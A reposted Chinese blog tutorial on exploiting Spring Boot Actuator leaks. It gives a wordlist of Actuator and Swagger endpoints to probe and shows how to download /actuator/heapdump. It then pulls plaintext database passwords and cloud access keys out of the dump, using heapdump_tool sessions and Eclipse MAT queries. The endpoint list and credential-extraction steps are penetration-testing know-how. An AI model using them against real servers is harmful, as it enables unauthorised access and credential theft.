Springboot信息泄露以及heapdump的利用

最新推荐文章于 2024-05-09 21:27:04 发布
最新推荐文章于 2024-05-09 21:27:04 发布
阅读量2.0k 收藏 8
点赞数 1
分类专栏: web安全 # 信息泄露 文章标签: spring boot java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854662/article/details/130238433
版权

本文转载于https://blog.csdn.net/weixin_44309905/article/details/127279561

heapdump的利用

0x01 Springboot信息泄露

在这里插入图片描述
渗透测试的时候老遇到spring的heapdump能下载但是不知道怎么利用,今天发几个工具让漏洞危害最大化。通过heapdump获取明文密码在深入利用。

路由列表

/api-docs
/v2/api-docs
/swagger-ui.html
/api.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/mappings
/actuator/mappings
/metrics
/actuator/metrics
/beans
/actuator/beans
/configprops
/actuator/configprops
/actuator
/auditevents
/autoconfig
/caches
/conditions
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/health
/actuator/conditions
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/scheduledtasks
/actuator/httptrace
/actuator/jolokia
/actuator/hystrix.stream

/trace:显示最近的http包信息,可能泄露当前系统存活的Cookie信息。
/env:应用的环境信息,包含Profile、系统环境变量和应用的properties信息,可能泄露明文密码与接口信息。
/jolokia:RCE漏洞
/heapdump:JVM内存信息,分析出明文密码

0x02 下载heapdump

​http://127.0.0.1:8088/actuator/​​查看泄露的端点信息
在这里插入图片描述
在这里插入图片描述
127.0.0.1:8088/actuator/heapdump 下载heapdump文件,泄露JAVA堆dump信息:
在这里插入图片描述

0x03 利用heapdump的姿势

工具一:heapdump_tool

heapdump敏感信息查询工具,例如查找 spring heapdump中的密码明文,AK,SK等。

https://github.com/wyzxxz/heapdump_tool
https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20220720/heapdump_tool.jar

在这里插入图片描述
工具使用

java -jar heapdump_tool.jar   heapdump.6

在这里插入图片描述

root@wy:~# 
> java -jar heapdump_tool.jar  heapdump.6
[-] file: heapdump.6
[-] Start jhat, waiting...
[-] get objects,waiting(1-2min)...
[-] fing object count: 113128
[-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit.
> spring.datasource.password
[-] Start find keyword: spring.datasource.password
>> spring.datasource.password -> test@wyzxxz 
[-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit.
> accesskey
[-] Start find keyword: accessKey
>> ConnectionProperties.noAccessToProcedureBodies -> When determining procedure parameter types for CallableStatements, and the connected user can''t access procedure bodies through "SHOW CREATE PROCEDURE" or select on mysql.proc should the driver instead create basic metadata
>> accessKey -> LTA**************
[-] please input keyword value to search, example: password,len=16,num=0-10,all=true,geturl,getfile,getip input q/quit to quit.
> q
[-] exit.

查询密码
在这里插入图片描述
获取IP
在这里插入图片描述
获取url
在这里插入图片描述
获取文件路径

此功能可获取到目标系统的依赖版本。
在这里插入图片描述

工具二:Eclipse MemoryAnalyzer

Eclipse MemoryAnalyzer 工具对泄露的heapdump文件进行分析,查询加载到内存中的明文密码信息。

http://www.eclipse.org/mat/downloads.php

在这里插入图片描述

Springboot信息泄露测试
Burpsuite Intruder模块扫描
在这里插入图片描述

heapdump读取
在这里插入图片描述
在这里插入图片描述

heapdump分析

2.2 heapdump分析
spring boot 1.x 版本 heapdump 查询结果,最终结果存储在 java.util.Hashtable$Entry 实例的键值对中

select * from org.springframework.web.context.support.StandardServletEnvironment

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

spring boot 2.x 版本 heapdump 查询结果,最终结果存储在 java.util.LinkedHashMap$Entry 实例的键值对中:

select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

在这里插入图片描述

读取Redis明文密码
在这里插入图片描述

zxl2605
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次heapdump泄漏获取服务器权限
千寻的博客
11-04 2114
1、通过获取边界服务器权限,进一步发现服务器的配置文件泄漏 2、通过代理,成功连接多台数据库、多个主机
WEB攻防-Java安全&原生反序列化&SpringBoot攻防&heapdump提取&CVE
m0_59598029的博客
02-27 908
序列化是将Java对象转换成字节流的过程。而反序列化是将字节流转换成Java对象的过程,java序列化的数据一般会以标记()开头,base64编码的特征为rO0AB。JAVA常见的序列化和反序列化的方法有JAVA 原生序列化和JSON 类(fastjson、jackson)序列化两种方式。两种方式做的事情都是一样的,为什么要区分开来?因为利用起来有所不同fastjson、jackson等反序列化就用网上给的EXP、POC去测试。
【web安全】Spring boot heapdump获取信息
顶峰
12-20 609
微服务是目前较为热门的技术,Spring bootSpring 的一套快速配置脚手架,可以基于Spring boot 快速开发单个微服务,微服务的特点决定了功能模块分布式部署,在不同的机器上相互通过服务调用进行交互,业务流会经过多个微服务的处理和传递。​ 多个微服务下,微服务的监控显得尤为重要。
【工具分享】一款HeapDump敏感信息提取工具
最新发布
weixin_57514792的博客
05-09 1139
一款HeapDump敏感信息提取工具
app渗透实战案例—Spring Boot Actuator未授权到脱库
good good study
12-09 7281
目录 前言 测试过程 查找敏感信息 Heapdump获取密码信息 前言 今天在做app渗透测试的时候,发现网站使用了Spring Boot框架。其存在一个未授权访问漏洞,通过寻找敏感字段获取了数据库地址和用户名,以及寻找密码获取了数据库连接密码直接拿下了数据库 测试过程 对app抓包,请求了一些服务器地址,我们将地址复制出来在浏览器访问 其中一个地址访问出现如下所示的页面,那么可以判断其使用了Spring Boot框架,Spring Boot框架是最流行的基于Java的微服务框架之一,
渗透测试-Spring Heapdump利用技巧
cdyunaq的博客
03-29 9290
在某次项目当中发现了一个spring bootheapdump泄露,无法使用常见的mat分析工具打开。在逛github的时候发现了一个比较好的工具,可对该heapdump提取密码,并且该工具的其他功能比较新颖,打开了heapdump的新玩法。 heapdump_tool:https://github.com/wyzxxz/heapdump_tool 运行环境:java 8 基础使用流程 java -jar heapdump_tool.jar 上面提到两种模式: 1)(search data
云主机秘钥泄露利用
技术超强的网络安全平台
08-02 1894
云平台作为降低企业资源成本的工具,在当今各大公司系统部署场景内已经成为不可或缺的重要组成部分,并且由于各类应用程序需要与其他内外部服务或程序进行通讯而大量使用凭证或密钥,因此在漏洞挖掘过程中经常会遇到一类漏洞:云主机秘钥泄露。此漏洞使攻击者接管云服务器的权限,对内部敏感信息查看或者删除等操作。此篇文章围绕如何发现秘钥泄露、拿到秘钥后如何利用展开。云主机通过使用AccessKey Id / Secret Access Key加密的方法来验证某个请求的发送者身份。Access Key。
Actuator内存泄露利用&Swagger未授权&自动化测试实现
qq_46081990的博客
12-20 2517
本文主要介绍了Actuator和Swagger的未授权访问导致的漏洞利用。Actuator提供了一系列端点用于监控和管理Spring Boot应用程序,但配置不当可能导致敏感信息泄露。Swagger是一个方便开发人员进行接口开发和测试的工具,可用于自动化接口漏洞安全测试。使用Postman、BurpSuite和Xray进行工具联动,自动化测试Swagger接口,可大大提升效率。
native_heapdump_viewer.py
07-16
使用方法如下: ...python native_heapdump_viewer.py --symbols symbols 00.txt >00.log python native_heapdump_viewer.py --symbols symbols 01.txt >01.log 对比00.log和01.log,查看内存增长的点
Heap Dump的IBM分析工具.zip
10-09
通过插件,VisualVM可以读取并分析heap dump,展示对象的大小、数量以及引用路径,帮助开发者找到内存泄漏的原因。 2. **MAT (Memory Analyzer Tool)**:MAT是IBM开发的一个专业内存分析工具,尤其擅长处理大内存...
heapdump分析工具
04-23
通过分析heapdump文件,我们可以找出占用内存较大的对象,追踪内存泄漏的源头,以及了解对象生命周期和垃圾收集情况。 要生成heapdump,可以使用JVM内置的命令行选项,例如`-XX:+HeapDumpOnOutOfMemoryError`来配置...
dump文件生成工具DumpTool
01-26
DumpTool主要用来在用户机器上对目标进程生成dump文件,定位“卡死”、Crash等问题。 (1)MiniDump: 表示生成一个包含必要信息dump文件,文件大小约200-500k,具体Flag =MiniDumpNormal|MiniDumpWithThreadInfo|MiniDumpWithHandleData|MiniDumpWithIndirectlyReferencedMemory (2)FullDump: 表示生成一个所有信息的完全dump文件,文件大小可能超过100M。 (3)生成的dump文件路径位于exe目录下的dump文件,文件名 2010-01-26 12.33.50_3256.dmp 前面部分表示日期,后面的3256表示进程ID。 (4)如果进程有多个实例,每个进程都会生成一个dump
IBM WEBSPHERE heapdump分析工具 ha456
01-25
本篇文章将详细介绍如何利用IBM WebSphere生成heapdump以及使用分析工具"ha456"进行故障排查。 首先,让我们理解heapdump的生成过程。在IBM WebSphere中,可以通过以下步骤创建heapdump: 1. 登录到WebSphere管理...
Spring Boot框架敏感信息泄露的完整介绍与SRC实战(附专属字典与PoC)
qq_50854662的博客
10-04 6890
转载于:https://www.freebuf.com/vuls/289710.html #前言##Spring Boot框架介绍Spring框架功能很强大,但是就算是一个很简单的项目,我们也要配置很多东西。因此就有了Spring Boot框架,它的作用很简单,就是帮我们自动配置,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。Spring Boot框架的核心就是自动配置,只要存在相应的jar包,Spring就帮我们自动配置。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的
heapdump定位内存泄露
momo459548255的博客
09-10 2245
heaxiaz Linux下分析一个core内存泄露的过程(3s大法) 对于dump很大的原因分析 准备环境 找到对应dms.core的jenkins上打包出来的版本程序解压到和core一起的路径 /log/core/core/DMS 准备工具 把heapdump工具也拷贝到/log/core/core/DMS下面 Gdb调试 gdb -c DMS_12409-1398407860-6.core DMS bt 可以清晰的看到是new出异常,而且core这么大,基本可...
Springboot之Actuator信息泄露漏洞利用
热门推荐
JHIII的博客
08-30 2万+
Spring Boot Actuator 模块提供了健康检查,审计,指标收集,HTTP 跟踪等,是帮助我们监控和管理Spring Boot 应用的模块。这个模块采集应用的内部信息,展现给外部模块,可以查看应用配置的详细信息,例如自动化配置信息、创建的Spring beans信息、系统环境变量的配置信息以及Web请求的详细信息等。如果没有正确使用Actuator,可能造成信息泄露等严重的安全隐患(外部人员非授权访问Actuator端点)。...
SpringBoot信息泄露利用
hot_milk1的博客
02-20 453
利用工具可获取敏感信息,以及可能存在部分RCE漏洞。其中前面可能会存在自定义字符串,例如。无法访问可利用双斜杠尝试绕过。
Swagger接口泄露(脱敏获取密码)
qq_42383069的博客
12-29 1万+
Swagger接口泄露(脱敏获取密码) 1. 概述: 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 2. 利用条件: 可正常 GET 请求目标 /heapdump 或 /actuator/heapdump 接口 3. 利用方法: 步骤一: 找到想要获取的属性名 GET 请求目标网站的 /env 或 /actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩
java dump分析工具_java性能分析与常用工具
weixin_39896839的博客
11-22 5942
本次源码已放在Github:https://github.com/nateshao/jvm-tuning个人博客https://nateshao.gitee.iohttp://www.nateshao.cnjava性能分析常用工具作为一个java程序员,最基本的要求就是用java语言编写程序,并能够在jvm虚拟机上正常运行,但是在实际开发过程中,我们所有的程序由于各种各样的原因,并不是总...
acquire heap dump
05-26
To acquire a heap dump in Java, you can use the following steps: 1. Identify the process ID (PID) of the Java process for which you want to acquire the heap dump. You can use the `jps` command to list all Java processes and their PIDs. 2. Use the `jmap` command to generate the heap dump. The syntax is as follows: ``` jmap -dump:format=b,file=<filename> <PID> ``` This command will create a binary heap dump file with the specified name (`<filename>`), in the current directory. 3. Once the heap dump is generated, you can use a tool like Eclipse MAT (Memory Analyzer Tool) to analyze it and identify memory leaks or other memory-related issues. Note that generating a heap dump can cause some performance overhead, so it's best to do it during a period of low activity in your application. Also, make sure that you have enough disk space available to store the heap dump file.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值